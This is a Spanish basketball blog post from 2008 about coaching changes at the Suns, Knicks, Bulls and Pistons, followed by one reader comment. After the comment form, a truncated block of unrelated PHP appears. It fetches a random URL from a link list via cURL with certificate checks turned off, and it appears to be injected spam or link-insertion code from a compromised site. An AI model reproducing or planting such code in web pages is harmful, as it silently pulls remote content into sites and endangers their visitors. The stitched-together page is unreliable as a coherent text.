Baile de banquillos

12 de June de 2008 por txusma

En las últimas fechas se han producido importantes cambios en los banquillos de algunos equipos de la NBA. Los banquillos de Suns, Knicks, Bulls y PIstonsya han cambiado de dueño.

Desde que los Spurs eliminaron a los Suns en primera ronda de los playoffs del oeste se había especulado con la marcha de Mike D’Antoni de la franquicia de Arizona. La llegada de Shaquille O’Neal a cambio de Shawn Marion había dejado herido de muerte al sistema run&gun que pregonaba y las malas sensaciones que dejó Phoenix en su enfrentamiento contra Popovic y sus pupilos, hacían pensar que los dirigentes de la franquicia darían por finiquitada una de las épocas más doradas de su franquicia. Efectivamente, el pasado 5 de mayo, D’Antoni anunciaba que escuchaba ofertas de otros equipos. Rápidamente saltaron a la palestra los nombres de los Chicago Bulls y los New York Knicks como posibles destinos y finalmente fue la franquicia de la Gran Manzana la que se llevó el gato al agua. Mike D’Antoni ocuparía el lugar de Isiah Thomas a razón de 6 millones por temporada.

Pero los Suns no han tardado mucho en encontrar un nuevo inquilino para su banquillo. El elegido ha resultado finalmente Terry Porter, ex-jugador de los Portland TrailBlazers al lado de Clyde Drexler y ex-entrenador de los Milwaukee Bucks en las temporadas 2003-2004 (en la que consiguió clasificar al equipo para los Playoffs) y 2004-2005. Con este fichaje se espera que aparezca un nuevo planteamiento de juego que sepa aprovechar las piezas de las que se compone actualmente la plantilla, tarea que, debido a la avanzada edad de alguno de sus integrantes como Shaquille O’Neal, Steve Nash o Grant Hill, se antoja harto complicada.

El tercer equipo que ha cambiado de entrenador en las últimas fechas han sido los Chicago Bulls. Después de negociar con D’Antoni y ser rechazados, la franquicia de la ciudad del viento se centró en un viejo conocido, Doug Collins, que ya entrenó a los Bulls precediendo en el cargo a Phil Jackson. Desgraciadamente para los Bulls el resultado fue el mismo y de nuevo iniciaron contactos para encontrar al entrenador encargado de resucitar al equipo. Después de negociar también con el asistente de los Sacramento Kings, Chuck Person y con el actual entrenador de los Minnessota Timberwolves, Dwane Casey, el elegido ha resultado finalmente un entrenador sin experiencia en los banquillos, el ex-jugador de los San Antonio Spurs, Vinny del Negro.

Y finalmente, Michael Curry, compañero de Joe Dumars en los Pistons de los 90 será el nuevo entrenador de Detroit en sustitución de Flip Saunders que no ha podido alcanzar las cotas de su predecesor, Larry Brown. Curry, que ha compartido vestuario con alguno de los que serán sus pupilos a partir del inicio de la próxima temporada promete mano dura y evitar la apatía que por momentos reinó en los partidos de playoffs de la franquicia de Michigan

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Con el baile que está habiendo de entrenadores, me viene la misma sensación que con la fiebre de movimientos que hubo a partir del fichaje de Gasol…
    En su gran mayoría me dejan frío.

    De los que se mencionan en este artículo, el mayor acierto me parece el de D’Antoni por los Knicks porque es un entrenador con mucha experiencia y que trasmite tener las ideas bastante claras (en ocasiones, demasiado claras) No obstante, la situación del equipo es tan penosa que será difícil evaluar su labor hasta después de bastante tiempo… y por otro lado es uno de esos fichajes rollo Antic con los equipos que coqueteaban con el descenso y terminaba bajándolos a todos. Es decir, no sé si es un entrenador para equipos con dificultades…

    Después, tanto Terry Porter como Vinnie del Negro me han parecido siempre tipos listos… aunque no sé si para sus equipos es lo más acertado utilizar entrenadores sin experiencia precísamente ahora.
    Para los Suns, bueno… parece que finalmente van a por la reconstrucción e importa poco quien esté a los mandos de un equipo a la deriva. Mal gesto es, sin embargo, hacia los jugadores que todavía defienden el actual proyecto, sobre todo para Stoudamire que debe de estar “cagándose en todo” por su juventud y proyección.
    Con respecto a los Bulls, sin embargo, la jugada es arriesgada teniendo en cuenta que el año que viene (una vez más) parece que pueden contar con una plantilla bastante maja. Todos sabemos lo que puede pasar en un equipo si se pone al mando a alguien que no esté preparado para dirigirlo. De momento le dejaremos el margen de la duda, pero si yo fuera de los Bulls estaría algo preocupado.
    Finalmente lo de Detroit… tiene muy mala pinta. Yo hubiera dejado a Saunders, no creo que lo haya hecho tan mal. Los problemas de este equipo creo que han sido de otra índole. Se ha acabado el ciclo definitivamente.

      Citar

  2. planetbasket.net dice:
    #2

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>